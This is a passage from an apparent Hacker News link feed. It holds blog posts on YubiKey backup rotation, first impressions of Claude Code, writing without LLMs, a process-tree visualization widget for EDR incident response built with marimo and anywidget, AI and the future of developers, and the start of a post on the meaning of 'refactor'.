When we start to look at a business, they'll want to consider something a bit more robust, like a '3-2-1'-esque strategy (3 copies, 2 different physical media, 1 copy off site).

Given these are yubikeys, we can't really do the 2 different physical media (especially as no other key maker even comes close to Yubikey's quality and security). But we can consider the 3 and 1 parts.

    We can easily have 3 yubikeys and 1 offsite. But now the maintenance of keeping all these updated is much harder. How do we take care of this?

Rotate the keys: on a schedule, the keys should be swapped in place (similar to industrial pumps with lead, lag, and reserve roles). We have a lead key that's used daily, the lag key which is the onsite backup, and the reserve which is offsite. We then periodically rotate them so that the lead becomes the lag, the lag becomes the reserve (and goes offsite), and the reserve is moved onsite as the new lead key. This way, any credentials missing from the new lead key (the former reserve) are quickly identified, and the lag key can be used to authorise enrolling the lead key in anything it was missing. A toy sketch of the rotation follows below.
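Here's that rotation expressed as a toy Python sketch (the key names are illustrative; the real process is of course physical):

def rotate(keys):
    """lead -> lag, lag -> reserve (ships offsite), reserve -> lead."""
    return {
        "lead": keys["reserve"],  # former reserve comes onsite for daily use
        "lag": keys["lead"],      # former lead becomes the onsite backup
        "reserve": keys["lag"],   # former lag is shipped offsite
    }

keys = {"lead": "yubikey-A", "lag": "yubikey-B", "reserve": "yubikey-C"}
keys = rotate(keys)  # run on a schedule, e.g. quarterly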

    I don't think this process is perfect - there is obviously a delay between a new account enrollment and it being on all three keys. This delay is going to be based on the rotation period. There is still also a risk that infrequently used accounts may be missed on one of the three keys, which can require some discipline to ensure that all credentials are periodically tested and verified as operational.

    I think this is a really interesting suggestion and has some promise, but I'd be keen to hear of other thoughts on the matter - or better ways to manage this. I certainly don't think this approach is for everyone either, but I can see a lot of places it would be quite valuable.

    ]]>
    https://fy.blackhats.net.au/blog/2025-02-28-backup-yubikey-strategy/ hacker-news-small-sites-43208914 Fri, 28 Feb 2025 18:42:43 GMT
    <![CDATA[Claude Code Initial Impressions]]> thread link) | @ingve
    February 28, 2025 | https://davidjarman.net/archive/2025/02/24/claude-code-initial-impressions | archive.org

    Claude Code Announcement

Anthropic announced a new hybrid reasoning Claude model today. Having a single model for both reasoning and quick responses is a great idea.

    What I'm more interested in is their new Claude Code tool. It's an interactive CLI that is similar to GitHub Copilot or Cursor, but only runs in your terminal as of now. Here is the link for setting it up: https://docs.anthropic.com/en/docs/agents-and-tools/claude-code/overview

I was hoping that this tool would just use my existing Claude plan, but no, of course you actually pay for the tokens it uses. I'm sure this was a very conscious decision, as this tool uses A LOT of tokens right now. I mean, it's breathtaking. The first thing I did was load it up on my link blog codebase, and ran the /init command to generate a readme file for the codebase. I immediately ran the /cost command to see how much that operation cost. Thirty cents. That may not sound like much, but given how small my codebase is, I was expecting it to only be a few cents. I then gave it a very specific task to add validation to my admin post authoring form. I gave it a fair bit of instruction, as the docs recommend treating the tool like a software engineer that you would delegate a task to. So I gave it hints as to how to find validation rules and all that. I then sent it off. It ran for something like 2 minutes making the change. It prompted me for permission to perform tool actions (e.g. run some bash commands, run build, etc). After a total of 10 minutes of use, I was up to $1.50 in spend, the code did not build, and I realized that the tool call to build the code was broken. Edit: It turns out PowerShell is not officially supported yet. You must use bash or zsh to launch claude.

    I'm still excited about this tool and will keep playing around with it. I'll probably have to reload my anthropic wallet with more credits soon as it is expensive, but so far it seems like a really cool concept, and I hope they keep improving it and driving down the cost.

    ]]>
    https://davidjarman.net/archive/2025/02/24/claude-code-initial-impressions hacker-news-small-sites-43208892 Fri, 28 Feb 2025 18:39:48 GMT
    <![CDATA[(We) don't use LLMs for writing]]> thread link) | @bredfield
    February 28, 2025 | https://www.madebybread.com/writing/don%27t-use-llms-for-writing | archive.org

All of our internal (values, playbook, proposals) and external (blog posts, product + architecture specs, emails, proposals) writing is generated the old-fashioned way: bashing your fingers (and sometimes head, as it feels like) across a keyboard. It's not because LLMs aren't capable, but because writing is a fundamental form of thinking.

    Given a personal data set, well-crafted prompt, and agentic "peer review" feedback loop, LLMs can match tone and craft logical arguments exceptionally well. The process:

    1. Have an idea
    2. Prompt the LLM to write
    3. Tune / refactor prompt
    4. Copy pasta
    5. Profit

    While the output of this can be (jarringly) good, that’s not the point. What's missed is critical - friction. And in this case, friction drives understanding, discovery, and humility.

    Understanding

    You know the feeling - you’ve just read a book, go to explain a core concept for the first time to someone, and you quickly realize that you don’t understand it as much as you thought you did. This is partly due to the generation effect, which states that work generated from your own mind is both understood and remembered better than if it's purely read from a source.

Writing is the best way to uncover gaps in your understanding of a topic. Forcing yourself to synthesize through your own words will quickly expose cracks in the facade of your grip on a subject. Feynman demonstrated this through teaching - the ability to take something complex and distill it down to its atomic and simple components. Writing is a vehicle to teach yourself, in that same capacity.

    Also important is the muscle of filtering signal from noise. Writing forces us to take multiple sources (be it literature, shower thoughts, conversations, etc.) and bundle up insight into simple, compact reasoning. This is painful, but drives deeper understanding.

    Discovery

    Writing forces you to make connections between ideas that are floating around in your brain. Your lived context, thoughts, opinions, and understanding form an ecosystem where ideas can collide and form novel connections. The process of writing slows us down, probes these connections, and helps facilitate those collisions (see: Where Good Ideas Come From).

    LLMs force a flow from thesis -> argument. In reality, good writing and novel ideas come from the inverse. Connecting the dots between ideas through writing can surface novel and often surprising opinions that often deviate from an original thesis.

By their nature, LLMs statistically converge arguments toward their most popular representation. This goes against the human "milieu" of outlier connections, ideas, and representations. As the majority of published writing shifts from human to AI, the human element of taste and weirdness will be what sets writing apart from the crowd.

    Humility

    There's a pervasive cognitive bias where limited understanding / competence leads to an overestimation of ability (The Dunning-Kruger Effect). Put another way - understanding breeds humility. And humility is essential to working together as humans.

    By skipping out on writing, we're collectively generating false-earned confidence.


AI has dizzying, industry-shifting applications, which we use extensively to help build products and companies. We're just careful to apply it to areas where friction isn't a lever. Creative reasoning and weird, novel ideas are pretty important in a world where execution is cheap.

    ]]>
    https://www.madebybread.com/writing/don%27t-use-llms-for-writing hacker-news-small-sites-43208827 Fri, 28 Feb 2025 18:32:49 GMT
    <![CDATA[Visualizing process trees with marimo and anywidget]]> thread link) | @akshayka
    February 28, 2025 | https://blog.cauchy.org/blog/anywidget/ | archive.org

    This work was inspired by a project at DNB’s Cyber Defense Center where we have been exploring the use of visualizations and data apps to help us do incident response more efficiently. The process tree visualization presented here re-envisions those data apps within the notebook environment, demonstrating how similar interactive analysis capabilities can be achieved in computational notebooks. While this specific implementation focuses on teaching core concepts, we hope to share more about our production security visualization work in future posts or presentations.

    Process creation event logs are one of the primary data sources when investigating security incidents. However, when treated as a collection of events, we are left with a tabular representation of what is in reality a tree relationship, and it can be difficult for an analyst to get an overview of what is going on. While Microsoft and other EDR vendors provide visualization tools out of the box, they come with some limitations: you can’t customize them, data expires after a while, and they are only available if you pay for premium tiers.

    In this post, we will show how to build an interactive process tree visualization by combining:

    • anywidget - a framework for creating custom Jupyter and marimo notebook widgets
    • marimo - a reactive Python notebook
    • ibis - a Python dataframe library that is backend agnostic
    • Apache Spark & Spark Connect - a distributed query engine
    • dependentree - d3 tree visualization library created by Square

Below is a diagram showing an overview of the system architecture and how the components relate to each other.

[Architecture diagram: a marimo app served at http://hostname:2718 hosts the anywidget-based ProcessTreeWidget, whose events (traitlets.List) and process_id (traitlets.Int) traitlets are synchronized between Python and the browser; ibis queries are executed on a remote Apache Spark cluster over spark-connect, reading event data from Delta tables.]
    Overview of the system architecture and data flow. Users create ibis dataframe queries in a marimo app that are executed on a remote Apache Spark cluster. The process creation events are retrieved, a tree structure is created and sent to the anywidget which renders the d3 process tree visualization.

    We will not dive deep into these tools here, but they all have great documentation and tutorials for those who want to learn more. In particular, for an introduction to anywidget, check out this presentation by the creator Trevor Manz, or watch his step-by-step tutorial on building a fun widget from scratch.

    Process Creation Events

    Even though we will use data from Microsoft Defender for Endpoint, the approach can be adapted to logs from any EDR. The MDE process creation events are stored in the DeviceProcessEvents schema. For the process tree use-case the important fields are summarized below.


• Timestamp - Date and time when the event was recorded
• ReportId - Event identifier based on a repeating counter. To identify unique events, this column must be used in conjunction with the DeviceName and Timestamp columns.
• DeviceName - Fully qualified domain name (FQDN) of the device
• ProcessId - Process ID (PID) of the newly created process
• FileName - Name of the file that the recorded action was applied to
• ProcessCreationTime - Date and time the process was created
• InitiatingProcessId - Process ID (PID) of the process that initiated the event
• InitiatingProcessFileName - Name of the process file that initiated the event; if unavailable, the name of the process that initiated the event might be shown instead
• InitiatingProcessCreationTime - Date and time when the process that initiated the event was started
• InitiatingProcessParentId - Process ID (PID) of the parent process that spawned the process responsible for the event
• InitiatingProcessParentFileName - Name of the parent process that spawned the process responsible for the event
• InitiatingProcessParentCreationTime - Date and time when the parent of the process responsible for the event was started

    To make the widget easier to re-use with different data sources, we will map the DeviceProcessEvents table to the ProcessEvent schema from the ASIM (Advanced Security Information Model). The Azure Sentinel repository contains ASIM parsers for many data sources. While these parsers are written in KQL (Kusto Query Language), it is straightforward to rewrite them as Ibis expressions.

from ibis import _  # ibis's deferred expression builder

process_creation_events = (
      events
        .filter(_.ActionType == "ProcessCreated")
        .distinct(
           on=["ReportId", "Timestamp", "DeviceName"], 
           keep="first"
        )
        .order_by(_.Timestamp)
        .mutate(
           TargetProcessId=_.ProcessId,
           TargetProcessFilename=_.FileName,
           TargetProcessCreationTime=_.ProcessCreationTime,
           # ...
        )
    )

    Ibis and Spark Connect

    By using Ibis the same code can run on a remote data system, locally using DuckDB or even in the browser. In a production system, you would typically connect to distributed query engines like Apache Spark, BigQuery or Snowflake.

Spark Connect allows you to execute Apache Spark queries remotely from a notebook environment (or any client). When you run queries from your notebook, the client sends your operations to the Spark server, which executes them and streams the results back to the client over gRPC in Arrow format. This client-server architecture lets us run intensive queries on powerful remote clusters while maintaining an interactive notebook experience.

    
import ibis
from databricks.connect import DatabricksSession
from databricks.sdk.core import Config

config = Config(profile="security")
    spark = DatabricksSession.builder.sdkConfig(config).getOrCreate()
    
    con = ibis.pyspark.connect(spark)
    device_process_events = (
        con.table(
            name="device_process_events",
            database=("security_logs", "mde"),
        )
        .select(_.properties)
        .unpack("properties")
    )
    
    t = ibis.memtable(device_process_events.to_pyarrow())

    An example of connecting to a remote Spark cluster on Databricks using Ibis and Spark Connect and creating an in-memory table backed by DuckDB. This approach allows remote query execution while maintaining local interactivity, though it’s worth noting that data transfer involves conversion through pandas before reaching DuckDB, so it’s not a zero-copy operation.

    Retrieving the right set of process creation events is an interesting challenge in itself, especially if you don’t have access to the complete start and end of a system session. One approach is to examine a wide time interval of process creation events and look for system boot markers like the Windows kernel (ntoskrnl.exe) being loaded. When investigating a specific process, you can define session boundaries by identifying when ntoskrnl.exe was loaded - the previous load marking the session start and the next load indicating a reboot and new session. While this information is typically available in dedicated system event logs, it can be reconstructed from process creation events with careful querying.

ntoskrnl_creation_events = (
  events
    .filter(_.ParentProcessFilename == "ntoskrnl.exe")
    .select(_.ParentProcessCreationTime)
    .distinct(on="ParentProcessCreationTime", keep="first")
)

    An example of how to identify system boot events by looking for ntoskrnl.exe as a parent process. While not implemented in our demo, this approach can help establish session boundaries when investigating incidents. In practice, you might simply look back a few hours or days from a suspicious event, or use other time-based filtering approaches depending on your investigation needs.
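As a rough sketch of how those boot markers could bound a session (my own illustration, not code from the project):

from datetime import datetime

def session_bounds(boot_times: list[datetime], suspicious_time: datetime):
    """Pick the ntoskrnl.exe load times bracketing a suspicious event."""
    boots = sorted(boot_times)
    start = max((b for b in boots if b <= suspicious_time), default=None)
    end = min((b for b in boots if b > suspicious_time), default=None)
    return start, end  # end is None if the machine has not rebooted since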

    For the remainder of this article, we’ll assume you already have a collection of process events (retrieved using Apache Spark, Splunk, Elastic, or some other query or search engine) and are now ready to create a process tree visualization. The techniques we’ll cover work regardless of how you obtained your process event data.

    Building the Tree

    Before we can create visualizations, we need to construct a tree structure from the process creation events. We will use treelib, an efficient tree manipulation library with no external dependencies. The library allows nodes to contain arbitrary data, so we will define a Process.

from datetime import datetime
from typing import ClassVar

from pydantic import BaseModel


class Process(BaseModel):

    # Sentinel used when an event does not carry a parent PID
    MISSING_PROCESS_ID: ClassVar[int] = -1

    # Process being created
    target_process_id: int
    target_process_filename: str
    target_process_creation_time: datetime

    # Direct parent process
    acting_process_id: int
    acting_process_filename: str
    acting_process_creation_time: datetime

    # Grandparent process
    parent_process_id: int
    parent_process_filename: str
    parent_process_creation_time: datetime

    def identifier(self) -> str:
        return f"{self.target_process_id}|{self.target_process_creation_time}"

    def parent_identifier(self) -> str:
        if self.acting_process_id == Process.MISSING_PROCESS_ID:
            return "<root>"

        return f"{self.acting_process_id}|{self.acting_process_creation_time}"
    

    As the root node, we use a placeholder value <root> from which all processes originate. Each process node has a unique identifier created by concatenating its target_process_id and target_process_creation_time values. When adding a node to the tree, we specify both its identifier and its parent’s identifier. The diagram below illustrates a process tree and shows how these fields relate to each other.

[Diagram: an example process tree rooted at a placeholder <root> node, with children such as services.exe (pid 1) → word.exe (pid 2) → cmd.exe (pid 3), plus pwsh.exe, svchost.exe, updater.exe and rdpclip.exe. Each event carries TargetProcessId, ActingProcessId and ParentProcessId linking three generations (e.g. the cmd.exe event has TargetProcessId = 3, ActingProcessId = 2, ParentProcessId = 1), and each node's identifier concatenates pid and creation time, e.g. 1|2024-11-01 00:00:42 and 2|2024-11-01 00:03:42.]

    An example of a process tree structure created by treelib. Nodes with diagonal stripes represent processes whose creation events were not directly available, but were reconstructed using ActingProcess or ParentProcess information from other events.

    The nodes shown with diagonal stripes (hatched pattern) represent processes where we do not have the original process creation event. This could be because we either did not retrieve the event or because it was not logged by the EDR. However, we can still partially reconstruct these nodes using information from other events - specifically, the ActingProcess or ParentProcess values.

    Next, we define a ProcessTree class that uses treelib to construct our tree structure. When initialized, this class creates a tree with a root node, and provides methods to build out the process hierarchy. The class handles both direct process creation events and reconstructs missing nodes using parent process information.

from typing import List

from treelib import Tree


class ProcessTree:
        def __init__(self, processes: List | None = None):
            self.tree: Tree = Tree()
            self.root = self.tree.create_node(
                tag="<root>", 
                identifier="<root>", 
                data=None
            )
    
        def insert_or_update(self, process: Process):
            ...
    
        def insert_process(self, process: Process):
            parent_process = Process(
                target_process_id=process.parent_process_id,
                target_process_filename=process.parent_process_filename,
                target_process_creation_time=process.parent_process_creation_time,
            )
    
            ... 
    
            self.insert_or_update(parent_process)
            self.insert_or_update(acting_process)
            self.insert_or_update(process)
    
        def create_dependentree_format(self):
          ...

    The ProcessTree class builds a tree structure from process events, tracking how processes are created and relate to each other. It can handle both direct process creation events and fill in missing information about parent processes, ensuring we have a complete picture of process relationships.

The create_dependentree_format method (omitted for brevity) transforms the hierarchical process structure into the format required by DependenTree, a graph visualization library built on D3's tree layout. The expected format is a list of dictionaries, where each dictionary represents a node (process) in the tree. The only fields required by DependenTree are _name and _deps; however, we want the tree structure to carry some additional fields as well:


• _name - The unique identifier of the process
• _deps - A list containing the identifier of the parent process; in our use-case there is always exactly one parent, so it's a single-element list
• ProcessName - The filename of the process
• FileName - Name of the file that the recorded action was applied to
• ProcessId - The process ID
• ProcessCreationTime - The creation time of the process
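As an assumed illustration of the output shape (based on the field list above, not the project's actual implementation), a single node might be emitted like this:

def node_to_dict(process, parent_identifier):
    return {
        "_name": process.identifier(),
        "_deps": [parent_identifier],  # always a single parent in our case
        "ProcessName": process.target_process_filename,
        "ProcessId": process.target_process_id,
        "ProcessCreationTime": str(process.target_process_creation_time),
    }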

    With the process tree data structure in place, the next step is creating an interactive widget for computational notebooks. anywidget does two things: it provides the tooling for Jupyter-compatible widget creation and implements the Anywidget Front-End Module (AFM) specification based on standard ECMAScript modules.

    To create the widget’s frontend, we need to write an ES module that defines lifecycle methods, e.g.,

    • initialize: Sets up the widget’s initial state and event listeners
    • render: Handles the actual rendering of the widget in the notebook

    The host platform (like Jupyter or marimo) loads this module and communicates with it through a standardized interface. Here’s the basic structure:

    export default {
      initialize({ model }) {
        // Add instance-specific event listeners
        return () => {
          // Clean up event listeners
        }
      },
      render({ model, el }) {
        // Render the widget
        return () => {
        // Clean up event listeners
        }
      },
    };

    The AFM module defines core widget lifecycle methods for initialization and rendering, each returning cleanup functions. Through synchronized traits, it enables bidirectional Python-JavaScript communication, allowing features like interactive selection and brushing. For details, see reusable widgets for interactive analysis and visualization in computational notebooks.

    For our Process tree visualization widget, we want to maintain a shared tree structure state between Python and JavaScript, with bidirectional synchronization of both the tree and the currently selected node. This means that when a user clicks a node in the visualization, the selection should be reflected in Python, and when we update the tree structure in Python, the widget should re-render the tree visualization. This bidirectional communication is handled through traitlets - we’ll define both an events trait for the tree structure and a process_id trait for tracking the currently selected process.

    For the host side we need to define an anywidget.AnyWidget subclass

import pathlib

import anywidget
import traitlets


class Widget(anywidget.AnyWidget):
    _esm = pathlib.Path(__file__).parent / "static" / "widget.js"
    events = traitlets.List([]).tag(sync=True)
    process_id = traitlets.Int(0).tag(sync=True)

    Process tree widget. The events property is a synchronized list that contains the process tree data. When this list is modified in Python, the changes are automatically reflected in the JavaScript client, triggering a re-render of the visualization. The _esm is the JavaScript side of things.

    For the AFM we need to load and setup the DependenTree, insert it into the DOM and pass it the events list which was generated by the create_dependentree_format method in our ProcessTree class. This connects our Python data structure to the JavaScript visualization.

    // slightly modified version to allow 
    // for node selection and styling
    import DependenTree from "https://esm.sh/gh/kyrre/dependentree@dev"
    
    export default {
    
      render({ model, el }) {
        this.treeDiv = document.createElement("div");
        this.treeDiv.id = "tree";
        this.activePid = null;
    
        // this callback function is called when the events list
        // is changed on the Python side, so we re-create the visualization
        // with the new data
        model.on("change:events", () => {
    
          this.tree.removeTree();
    
          this.tree = new DependenTree(this.treeDiv, options);
          this.tree.addEntities(structuredClone(model.get("events")));
          this.tree.setTree('<root>', 'downstream');
    
        });
    
    
        el.classList.add("process_tree_widget");
        el.appendChild(this.treeDiv);
    
        const options = {
          // ... 
          // settings omitted for brevity
    
          // whenever we click a node in tree we update the 
          // process_id value, which is then synced back to 
          // Python via the process_id traitlet
    
          nodeClick: (node) => {
            model.set("process_id", node.ProcessId);
            model.save_changes();
          }
        };
    
        // the rendering needs to complete before we create the tree
        // via discord :blessed:
        requestAnimationFrame(() => {
          this.tree = new DependenTree(this.treeDiv, options);
          this.tree.addEntities(structuredClone(model.get("events")));
          this.tree.setTree('<root>', 'downstream');
        });
      }
    }

    The process tree visualization AFM implements the widget’s frontend logic. It creates a DOM container for the tree, initializes the DependenTree visualization library, and establishes bidirectional communication with Python. When the shared events state changes (triggered from Python), the “change:events” callback recreates the visualization using the new data. Conversely, when a user clicks a node, the widget updates the process_id value, which synchronizes back to Python, enabling interactive exploration.

    Interactive Demo

    With all the components for our process tree visualization in place, we can now build a notebook that showcases how the widget works in practice, allowing you to:

    1. Filter process events by time range by using a marimo datetime slider
    2. Explore the hierarchical process tree structure
    3. Select individual processes to view their details
    4. See the bidirectional communication between Python and JavaScript in action

    Since marimo notebooks can be run entirely in the browser by using Pyodide (CPython ported to WebAssembly), we can generate a static WASM notebook and embed directly into an iframe. This is great for documentation and for creating examples.

Note: When running in WebAssembly via Pyodide, we need to handle a few additional setup steps - specifically downloading and installing packages through micropip, and fetching our Parquet data files via HTTP, converting them to Arrow and creating the in-memory dataframe. While this setup code may look a bit involved, most of the complexity is due to the workarounds needed to run the demo in a browser environment. The core visualization functionality remains the same whether you're running locally or in WebAssembly.
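For the curious, that WASM-only setup boils down to something like this sketch (the package names and data path are illustrative, and it assumes pyarrow is available in the Pyodide distribution):

import micropip

async def setup():
    # Install pure-Python wheels at runtime inside Pyodide
    await micropip.install(["treelib", "anywidget", "pydantic"])

    import io
    import ibis
    import pyarrow.parquet as pq
    from pyodide.http import pyfetch

    # Fetch the Parquet file over HTTP and build an in-memory ibis table
    resp = await pyfetch("data/process_events.parquet")  # hypothetical path
    table = pq.read_table(io.BytesIO(await resp.bytes()))
    return ibis.memtable(table)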

Below you’ll find an interactive notebook where you can explore the example data. Note that the nodes themselves must be double-clicked to expand. Opening the notebook in a new tab is recommended to better explore the more deeply nested subtrees. The tree can be seen close to the bottom of the notebook after giving it some time to generate.

It doesn’t work on mobile, so in that case there’s only a video.

    Interactive process tree visualization running entirely in your browser via WebAssembly. This demo showcases the power of bidirectional communication between Python and JavaScript - you can filter the dataset using the time range controls, and clicking on any process node updates the Python state, allowing for detailed inspection of selected processes. The reactive nature of marimo ensures all components stay synchronized as you explore the data.

It’s also clear from the visualization that the EDR wasn’t able to log all the process relationships, which is why not all processes are properly nested under ntoskrnl.exe. This illustrates the challenge we discussed earlier with the hatched nodes in our tree diagram - some process creation events are missing from the logs, requiring us to reconstruct relationships from parent process information. We recommend exploring the subtree ntoskrnl.exe → smss.exe → winlogon.exe → userinit.exe → explorer.exe, which shows a user launching a sequence of applications.

    Conclusion

    In this post, we demonstrated how to build an interactive process tree visualization widget using:

    • marimo - a reactive Python notebook environment
    • anywidget and AFM - connecting Python and JavaScript for widget creation
    • DependenTree - creating interactive tree visualizations with d3
    • ibis - a backend-agnostic dataframe library

By transforming raw process logs into an interactive tree visualization, this widget helps incident responders understand the chain of process executions when investigating security issues. The bidirectional communication between Python and JavaScript enables interactive analysis: analysts can click on nodes in the visualization to select processes of interest, then query and analyze the selected process data in Python. This integration of visualization and analysis helps explore process relationships and examine details when investigating security incidents.

    The solution can work with different EDR data sources by mapping their process events to the ASIM schema, and the visualization can be modified using D3 and other JavaScript libraries or frameworks like React or Vue. Additionally, thanks to Pyodide, the notebook can run directly in the browser via WebAssembly, making it easy to share and demonstrate.

    Future Improvements

    While the current implementation works well for typical process trees, there are some areas for future enhancement:

    • Handling processes with many children: The visualization can become overwhelming when dealing with processes that spawn hundreds of child processes (like services.exe).
    • Timeline filtering: Adding timeline controls would allow users to focus on specific time intervals, making it easier to analyze process relationships during particular periods of interest.
    • Additional context: Incorporating more process metadata and allowing filtering based on process attributes could provide valuable context during investigations.

    The code and documentation for this project is available in our GitHub repository.

    References

    • anywidget - Framework for creating custom Jupyter and marimo notebook widgets
    • marimo - Reactive Python notebook
    • ibis - Python dataframe library
    • Apache Spark - Distributed query engine
    • Spark Connect - Spark’s client-server interface
    • dependentree - D3 tree visualization library
    • treelib - Tree data structure manipulation library
    • Pyodide - Python runtime for the browser
    ]]>
    https://blog.cauchy.org/blog/anywidget/ hacker-news-small-sites-43208696 Fri, 28 Feb 2025 18:20:05 GMT
    <![CDATA[Software Development Is Dead, Long Live Developers]]> thread link) | @mikeflynn
    February 28, 2025 | https://c33tech.com/blog/2025/02/software_development_is_dead_long_live_developers/ | archive.org

    “If you don’t learn to code, in ten years it will be like being illiterate!”

    That was what someone exclaimed on a panel discussion I was on in 2013. It was a talk about bringing technology and entertainment together held in Beverly Hills and hosted by a coding bootcamp company. Two of the people on the panel were from a different bootcamp company, and then there was me, an actual technologist working in entertainment. Surely I would agree that everyone needs to learn to code, right?

Actually, I’ll disagree a bit with the other panelists on this. Do I think everyone should try coding at some point in their education? Yes. Similar to art, music, and writing, everyone, but especially children, should be exposed to coding to see if they enjoy it or have a talent for it. But do I think that everyone should be coding all the time? No. Would I equate it to illiteracy? No. Why? Because coding is hard! Sure, you have to learn the programming language syntax, and learn how to run the code and all of the other mechanics of development, but what’s most difficult is the fact that you have to think through problems in a very structured, logical way. Not everyone is wired to think like that, in the same way that not everyone can find the beat in a song, or can draw a cat in a way that other people would actually recognize as a cat.

The good news is that you don’t need to learn to code to use technology, in the same way that you don’t need to know how to take apart a carburetor to drive your car. Technology will come to you as it matures and society accepts it. If you have the interest or a goal to learn how to code or anything technical, I strongly encourage you to do the work and hopefully become successful, but you don’t need to do any of that to use Facebook or make a spreadsheet in Excel, and that’s not going to change.

    They didn’t invite me back for any more of their panels.

    Here we are now in 2025, over ten years since I sat on that panel and not only do I not get the sense that anyone feels particularly illiterate if they don’t know how to scrape some Python together, the narrative has done a full 180! Don’t bother learning to code! AI will code all the things!

    In a recent interview with Joe Rogan, Meta CEO Mark Zuckerberg said that AI will replace mid-level engineers in 2025. He believes AI can take over coding tasks, allowing human engineers to focus on higher-level problem-solving and creativity. Other tech giants like Google have also started integrating AI into coding processes. While initially costly, companies hope the transition to AI-generated code will become more efficient over time. This shift may reduce the demand for mid-level coding roles, pushing software engineers towards more strategic responsibilities.

    Yet again, I’m about to be another wet blanket. Only the hype has changed.

    Just as I did in 2013, I will start with some common ground. Yes, AI/LLMs are helpful for developers and absolutely can make a developer more efficient. At the moment, I am coding a lot as I am in a Start-Up CTO role, and I use GitHub’s Copilot and have experimented with some of the other models. The experience has been largely quite good. I absolutely see a return on the investment of the $10/month for Copilot plus a few extra dollars in API requests every month. I will also agree that people who can’t code have been able to use LLMs to generate things they wouldn’t have been able to otherwise. Seeing people dream up and create scripts for document automations, Excel macros, or Google Doc scripts is genuinely exciting and potentially a huge gain in productivity for those people. The problem is that none of the things I just mentioned are fully descriptive of what software developers do.

    Developers understand and solve problems. The tech changes all the time, but the problem-solving doesn’t. People used to write assembly code, then higher-level languages came that were more approachable and allowed for more efficient development, but the result wasn’t fewer developers, it was more developers. Way more! Software ate the world, and the process of translating a problem into something that can be solved by new code was an increasingly critical skill. Writing a Python script to reformat a CSV, make a blog, or scrape content off the internet is a great demo, but most developers aren’t making little scripts; they are working on huge advanced systems that integrate into other huge advanced systems. Even if LLMs can someday create perfect code, the requirement to understand the problem enough to describe the solution you need remains a steep climb. Then there’s the matter of distributing the resulting code, which leads to potentially big questions about scale! It goes on and on and on…

    Sexy AI demos from a guy sitting behind a MacBook and talking a little more slowly than you’d prefer make for a fun LinkedIn post filled with emoji, but they’re a far cry from the robot developer army Zuckerberg is pitching to Rogan, and even OpenAI agrees.

    In a new paper, the company’s researchers found that even frontier models, or the most advanced and boundary-pushing AI systems, “are still unable to solve the majority” of coding tasks.

    The researchers used a newly developed benchmark called SWE-Lancer, built on more than 1,400 software engineering tasks from the freelancer site Upwork. Using the benchmark, OpenAI put three large language models (LLMs) – its own o1 reasoning model and flagship GPT-4o, as well as Anthropic’s Claude 3.5 Sonnet – to the test.

    Specifically, the new benchmark evaluated how well the LLMs performed with two types of tasks from Upwork: individual tasks, which involved resolving bugs and implementing fixes to them, or management tasks that saw the models trying to zoom out and make higher-level decisions. (The models weren’t allowed to access the internet, meaning they couldn’t just crib similar answers that’d been posted online.)

    Though all three LLMs were often able to operate “far faster than a human would,” the paper notes, they also failed to grasp how widespread bugs were or to understand their context, “leading to solutions that are incorrect or insufficiently comprehensive.”

    Yes, the models will continue to advance. Claude 3.7 in particular is making some noise as of this writing, but if you can focus your eyes and see through the hype, this will start to look familiar.

    What a developer has done throughout a given day has been under constant change since the beginning. We’re not punching little holes in carefully ordered cards anymore. We’re not writing machine code by hand anymore, and soon maybe we won’t need to type quite as much as we do today, but none of that was ever really the job. The job of a developer is to understand how things work, diagnose problems, and use the best tools available to solve those problems. That’s not going away.

    Software development as you knew it is dead. It is changing into something else, just like it always has. Long live software development!

    ]]>
    https://c33tech.com/blog/2025/02/software_development_is_dead_long_live_developers/ hacker-news-small-sites-43208668 Fri, 28 Feb 2025 18:17:10 GMT
    <![CDATA["Refactor" Is Not a Scary Word]]> thread link) | @mooreds
    February 28, 2025 | https://kyleshevlin.com/refactor-is-not-a-scary-word/ | archive.org

    “Refactor” is Not a Scary Word

    One thing I’ve struggled with throughout my life is using a word with a specific definition that gets interpreted differently. It causes me a great deal of frustration. It might be unreasonable to expect people to walk around with a Merriam-Webster’s dictionary in their pocket, so mistakes are bound to happen.

    I recently lost a potential client and I’m convinced the reason why is because we had different definitions for a single word: “refactor”.

    “I’ll need to refactor some of these components to support your new use cases.” This was a benign, workaday statement using common jargon for software engineers, yet I could tell it struck fear in this client. I never had a chance after that.

    I don’t know when it happened, but “refactor” became a scary word, and we need to get it back.

    Why is it a scary word?

    I have no research to back up what I’m about to claim, but my suspicion is that people recoil at the word “refactor” because it’s caused them trauma, primarily in the way of costs.

    I think somehow it has become an ambiguous term in the industry roughly meaning “large, time-consuming, and potentially dangerous changes to code.” I find this deeply upsetting as it’s essentially the opposite of what the word means, which I will discuss shortly.

    Without adherence to a strict definition, I imagine there have been many instances where an engineer mentioned “we need to refactor this” to a manager, and next thing you know, the roadmap ends up derailed, or the project is a failure, or even worse, the company goes out of business.

    These outcomes shouldn’t be the result of refactoring, and we should really get on the same page about the word to avoid this from happening.

    What does the word actually mean?

    When I use the word “refactor” or “refactoring”, I mean these two specific definitions that come from the book “Refactoring” by Martin Fowler:

    • Refactoring (noun): a change made to the internal structure of software to make it easier to understand and cheaper to modify without changing its observable behavior.
    • Refactoring (verb): to restructure software by applying a series of refactorings without changing its observable behavior.

    The key part of the definition here is “without changing observable behavior”.

    If you are refactoring, it does not mean rewriting the code from scratch. It does not mean making some changes while adding new features. It doesn’t even mean changing the structure and hoping it’s the same. It means changing the structure of the code knowing it’s the same.

    There should be no equivocation about this.

    Implications of the proper definition

    The only way to make changes while knowing the observable behavior hasn’t changed is to have a testing suite that can confirm or deny this. Honestly, if you’ve avoided writing tests in your career, you’re doing yourself a disservice. Coding is one of the few industries where we can cheaply and easily verify our work is correct. All it takes is writing a few lines of code. Imagine doing something similar in the physical world, where testing might cost just as much as the actual implementation.

    Extrapolating from this, if we must keep the tests green as we make our changes, I think it suggests two things:

    • The changes we make should be small, incremental steps to our goal

    We should be able to make each change to our code in an understandable fashion. The way we accomplish big changes is through the composition of many small ones. With each small change, we should keep the tests green.

    • These small changes reveal algorithmic patterns, aka refactorings, that are repeatable

    We can define what are essentially “recipes” for restructuring code, and for those keen on reading the book, it provides over 60 of them to get started. There are more that can be defined as well.

    This means that when we’re doing a refactoring properly, we should be doing the following:

    • Tests related to the code we are changing should be running in a watch mode (example commands below)
    • We should be able to make an atomic commit with each step
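
    With Vitest, for example (one of the runners mentioned later in this article), keeping tests running in watch mode is a single command. A usage sketch, not part of the original article:

    npx vitest        # watch mode is the default; reruns tests on every file change
    npx vitest run    # one-off run, for CI or a final check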

    An example

